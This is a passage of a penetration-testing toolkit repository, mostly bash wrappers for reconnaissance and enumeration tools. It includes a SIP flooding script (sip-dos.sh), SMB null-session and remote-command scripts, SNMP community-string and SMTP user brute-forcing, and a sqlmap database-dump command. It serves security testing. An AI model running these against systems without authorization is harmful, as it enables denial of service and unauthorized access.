4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
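# Resolve every host listed in a file and store the IPv4 addresses of each
# one in ip-address-<host>.txt in the current directory.
#
# Arguments:
#   $1  a file containing the target hosts, one per line.

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide a file containing a list of target hosts." 1>&2
    exit 1
fi

# "|| [[ -n ... ]]" still processes a last line that has no trailing newline;
# -r stops read from interpreting backslashes in the list.
while read -r line || [[ -n "$line" ]]; do
    # Tolerate lists saved with Windows line endings.
    line=${line%$'\r'}

    # A blank line would run host without a name and create "ip-address-.txt".
    [[ -z "$line" ]] && continue

    # Entries come from a file, not from the operator's own command line: do
    # not let one that starts with "-" be parsed by host as an option.
    if [[ $line == -* ]]; then
        echo "Skipping invalid entry: $line" 1>&2
        continue
    fi

    echo "IP Lookup - $line"

    # The entry becomes part of a file name; replace "/" so it cannot point
    # the redirection at another directory.
    out_file="ip-address-${line//\//_}.txt"
    host "$line" | grep "has address" | cut -d" " -f4 > "$out_file"
done < "$1"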
33 |
--------------------------------------------------------------------------------
/reconnaissance/mx.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
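# List the mail exchanger (MX) records of a domain using `host`.
#
# Arguments:
#   $1  the target host.

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target host." 1>&2
    exit 1
fi

# Quoted so the shell passes the name to host as a single word.
host -t mx "$1"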
30 |
--------------------------------------------------------------------------------
/reconnaissance/nameservers.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
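# Look up the NS records of the domain given as the only argument.
if [ $# -eq 1 ]; then
    # Quoted so the argument is passed to host unchanged, as a single word.
    host -t ns "$1"
else
    # Report the usage error on stderr and fail, so callers can detect it.
    echo "Please provide the target host." >&2
    exit 1
fi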
30 |
--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 HatBashBR
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/README.md:
--------------------------------------------------------------------------------
1 | # Dependencies
2 | Install shodan with `pip install shodan` or `easy_install shodan`.
3 | Install python-nmap with `pip install python-nmap`.
4 | Set your API key in the 'constantes.py' file. The key is a credential, so keep the populated file out of version control.
5 |
6 | # Options
7 | -h, --help show this help message and exit
8 | -i IP, --ip=IP info about one host
9 | -l LIST, --list=LIST info about a list of hosts
10 | -s SQ, --sq=SQ searchquery string
11 | --nmap perform a nmap scan in the hosts
12 | --setkey=SETKEY set your api key automatically
13 | -r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
14 | -o OUTPUT, --output=OUTPUT specify a output file
15 |
16 | Nmap Options:
17 | --sS TCP Syn Scan
18 | --sT TCP Connect Scan
19 | --sU UDP Scan
20 |
21 | # Usage
22 | For One Host
23 | python shodanhat.py -i IP
24 | For a list of Hosts
25 | python shodanhat.py -l list.txt
26 | You can also set a searchquery to make a specific query with '-s' option!
27 |
28 | # ScreenShots
29 | 
30 |
--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maldevel/PenTestKit/45ab5a4e2f5ad007b5ac8832d35d03edb5a2cc27/reconnaissance/shodan/shodanhat/__init__.py
--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/constantes.py:
--------------------------------------------------------------------------------
# Shodan API key; the project README asks for it to be set in this file.
# Empty as shipped. Once filled in, this file holds a credential and should
# not be committed or shared together with scan output.
SHODAN_API_KEY = ""
--------------------------------------------------------------------------------
/reconnaissance/smtp-banner.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
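# Run Metasploit's smtp_version scanner against the server given as the only
# argument, feeding the console a resource script on stdin (-r -).
if [ $# -eq 1 ]; then
    # $1 is expanded inside the here-document below, where every line is read
    # as a console command. A newline or other control character in the
    # argument would therefore add lines of its own, so reject it up front.
    case $1 in
        *[[:cntrl:]]*)
            echo "Please provide the target smtp server." >&2
            exit 1
            ;;
    esac
    msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_version
set RHOSTS $1
run
exit
EOF
else
    echo "Please provide the target smtp server." >&2
    exit 1
fi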
35 |
--------------------------------------------------------------------------------
/reconnaissance/webrecon.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
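# Run web-reconnaissance.py (looked up in the current directory) against the
# URL in $1, write its log to $2, convert the log to HTML and open it.
if [ $# -eq 2 ]; then
    # Both arguments are quoted: URLs commonly contain '&', '?' and '*', and
    # the log path may contain spaces.
    python web-reconnaissance.py -u "$1" -o "$2"
    pandoc -s -o "$2.html" "$2"
    xdg-open "$2.html"
else
    echo "Please provide the target url and a filepath to save logs." >&2
    exit 1
fi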
32 |
--------------------------------------------------------------------------------
/reconnaissance/whois.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
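# Run a whois lookup for every entry of the list file given in $1 and save
# each answer to "whois-<entry>.txt" in the current directory.
if [ $# -eq 1 ]; then
    # -r keeps backslashes literal; the || clause still processes a final
    # line that has no trailing newline.
    while read -r line || [[ -n "$line" ]]; do
        # A blank line would run whois without a query and create "whois-.txt".
        [[ -z "$line" ]] && continue
        # An entry starting with '-' would be read by whois as an option.
        if [[ $line == -* ]]; then
            echo "Skipping entry that looks like an option: $line" >&2
            continue
        fi
        echo "Whois Lookup - $line"
        # The list is data, not a trusted path: replace '/' so an entry
        # cannot move the output file out of the current directory.
        whois "$line" > "whois-${line//\//_}.txt"
    done < "$1"
else
    echo "Please provide a file containing a list of target hosts." >&2
    exit 1
fi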
33 |
--------------------------------------------------------------------------------
/reconnaissance/zone-transfer.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
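# Ask the nameserver in $2 for a listing (host -l) of the zone named in $1.
if [ $# -eq 2 ]; then
    # Quoted so each value is passed to host as exactly one argument.
    host -l "$1" "$2"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a target host and a nameserver." >&2
    exit 1
fi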
30 |
--------------------------------------------------------------------------------
/sip/scanner-svwar.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
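# Run svwar with the INVITE method against host $1 on port $2.
if [ $# -eq 2 ]; then
    # Quoted so neither value is split or glob-expanded by the shell.
    svwar -D -m INVITE -p "$2" "$1"
else
    echo "Please provide the target host and port." >&2
    exit 1
fi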
30 |
--------------------------------------------------------------------------------
/sip/sip-dos.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
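# Positional parameters, as named by the usage text below: host, network
# interface, internal phone number, alias.
if [ $# -eq 4 ]; then
    # Every parameter is quoted so it is passed through as a single word.
    svwar -D -m INVITE -p "$2" "$1"
    sudo inviteflood "$2" "$3" "$1" "$1" -a "$4" 1000000000
else
    echo "Please provide the target host, network interface, internal phone number and an alias." >&2
    exit 1
fi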
31 |
--------------------------------------------------------------------------------
/skid/README.md:
--------------------------------------------------------------------------------
1 | ## README
2 |
3 | ### SKID mode
4 |
5 | ```
6 | chmod a+x -R PenTestKit/grep
7 | chmod a+x -R PenTestKit/live-hosts
8 | chmod a+x -R PenTestKit/generate-scripts-lists
9 | chmod a+x scan-external-ip-range.sh
10 | sudo ./scan-external-ip-range.sh x.x.x.x/yy
11 | ```
12 |
13 | ---
14 |
--------------------------------------------------------------------------------
/smb/null-session.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
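# Open an rpcclient session to $1 with an empty user name (-U "") and no
# password prompt (-N). A server that accepts this allows null sessions.
if [ $# -eq 1 ]; then
    # Quoted so the host is passed as one argument.
    rpcclient -U "" -N "$1"
else
    echo "Please provide a target host." >&2
    exit 1
fi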
30 |
--------------------------------------------------------------------------------
/smb/scan-enum4linux.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
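# Run enum4linux against $1 and keep a copy of stdout and stderr in
# "enum4linux_<host>.txt".
if [ $# -eq 1 ]; then
    # '/' is replaced in the log name so the argument cannot point the log
    # into another directory; ordinary host names and IPs are unaffected.
    enum4linux -a -v -M -l -d "$1" 2>&1 | tee "enum4linux_${1//\//_}.txt"
else
    echo "Please provide the target host." >&2
    exit 1
fi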
30 |
--------------------------------------------------------------------------------
/smb/scan-execute-command.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
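# Run "ipconfig /all" through smbmap on host $1, port $2: once with smbmap's
# default credentials and once as user "null" with an empty password.
# Both runs are appended to the same log file.
if [ $# -eq 2 ]; then
    # '/' is replaced in the log name so neither argument can move the log
    # out of the current directory.
    log="smbmap-execute-command_${1//\//_}_${2//\//_}.txt"
    smbmap -H "$1" -P "$2" -x "ipconfig /all" 2>&1 | tee -a "$log"
    smbmap -u null -p "" -H "$1" -P "$2" -x "ipconfig /all" 2>&1 | tee -a "$log"
else
    echo "Please provide the target host and port." >&2
    exit 1
fi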
30 |
--------------------------------------------------------------------------------
/smb/scan-list-contents.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
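# List share contents recursively (-R) with smbmap on host $1, port $2: once
# with smbmap's default credentials and once as user "null" with an empty
# password. Both runs are appended to the same log file.
if [ $# -eq 2 ]; then
    # '/' is replaced in the log name so neither argument can move the log
    # out of the current directory.
    log="smbmap-list-contents_${1//\//_}_${2//\//_}.txt"
    smbmap -H "$1" -P "$2" -R 2>&1 | tee -a "$log"
    smbmap -u null -p "" -H "$1" -P "$2" -R 2>&1 | tee -a "$log"
else
    echo "Please provide the target host and port." >&2
    exit 1
fi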
30 |
--------------------------------------------------------------------------------
/smb/scan-nbtscan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
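# Run nbtscan against $1 and keep a copy of the output in "nbtscan_<target>.txt".
if [ $# -eq 1 ]; then
    # A target written in CIDR form (a.b.c.d/nn) contains '/', which would
    # make tee look for a directory; replace it in the log name only.
    nbtscan -rvh "$1" 2>&1 | tee "nbtscan_${1//\//_}.txt"
else
    echo "Please provide the target host." >&2
    exit 1
fi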
30 |
--------------------------------------------------------------------------------
/smb/scan-share-permissions.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
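# List shares and their permissions with smbmap on host $1, port $2: once
# with smbmap's default credentials and once as user "null" with an empty
# password. Both runs are appended to the same log file.
if [ $# -eq 2 ]; then
    # '/' is replaced in the log name so neither argument can move the log
    # out of the current directory.
    log="smbmap-share-permissions_${1//\//_}_${2//\//_}.txt"
    smbmap -H "$1" -P "$2" 2>&1 | tee -a "$log"
    smbmap -u null -p "" -H "$1" -P "$2" 2>&1 | tee -a "$log"
else
    echo "Please provide the target host and port." >&2
    exit 1
fi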
30 |
--------------------------------------------------------------------------------
/smb/scan-smbclient.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
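# List the shares of the server at address $1 without a password (-N) and
# keep a copy of the output in "smbclient_<host>.txt".
if [ $# -eq 1 ]; then
    # The address is quoted for smbclient, and '/' is replaced in the log
    # name so the argument cannot redirect the log to another directory.
    smbclient -L\\ -N -I "$1" 2>&1 | tee "smbclient_${1//\//_}.txt"
else
    echo "Please provide the target host." >&2
    exit 1
fi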
30 |
--------------------------------------------------------------------------------
/smtp/user-enum.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
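# Check the user names of a fixed list against the SMTP server at $1:$2 with
# the VRFY method and keep a copy of the output in a per-target log file.
if [ $# -eq 2 ]; then
    wordlist="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
    # The list is expected under /usr/share/seclists; stop with a clear
    # message when it is missing instead of starting the tool without it.
    if [ ! -r "$wordlist" ]; then
        echo "Username list not found: $wordlist" >&2
        exit 1
    fi
    # '/' is replaced in the log name so neither argument can move the log
    # out of the current directory.
    smtp-user-enum -M VRFY -U "$wordlist" -t "$1" -p "$2" 2>&1 | tee "smtp_user-enum_${1//\//_}_${2//\//_}.txt"
else
    echo "Please provide the target host and port." >&2
    exit 1
fi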
30 |
--------------------------------------------------------------------------------
/snmp/community.lst:
--------------------------------------------------------------------------------
1 | public
2 | private
3 | manager
4 |
--------------------------------------------------------------------------------
/snmp/discover.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
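# UDP-scan port 161 on the host or range in $1 and show only open ports.
if [ $# -eq 1 ]; then
    # Quoted so the target specification reaches nmap as one argument.
    nmap -sU --open -p 161 "$1"
else
    echo "Please provide a target host or a target ip range." >&2
    exit 1
fi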
30 |
--------------------------------------------------------------------------------
/snmp/scan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
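# Try the community strings of a fixed list against $1 with onesixtyone and
# keep a copy of the output in "snmp_onesixtyone_<host>.txt".
if [ $# -eq 1 ]; then
    communities="/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt"
    # Stop with a clear message when the list is missing instead of
    # starting the tool without it.
    if [ ! -r "$communities" ]; then
        echo "Community list not found: $communities" >&2
        exit 1
    fi
    # '/' is replaced in the log name so the argument cannot move the log
    # out of the current directory.
    onesixtyone -c "$communities" -dd "$1" 2>&1 | tee "snmp_onesixtyone_${1//\//_}.txt"
else
    echo "Please provide a target host." >&2
    exit 1
fi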
30 |
--------------------------------------------------------------------------------
/sqli/sqlmap.md:
--------------------------------------------------------------------------------
1 | ## SQLmap notes
2 |
3 | ### Get database schema
4 |
5 | * Microsoft SQL Server
6 | * Error-based
7 | * POST
8 | * Burp Pro proxy
9 | * Specific database
10 |
11 | ```bash
12 | sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/ssl/ssl-scan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
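# Run sslscan against $1:$2, writing an XML report and a text copy of the
# console output next to it.
if [ $# -eq 2 ]; then
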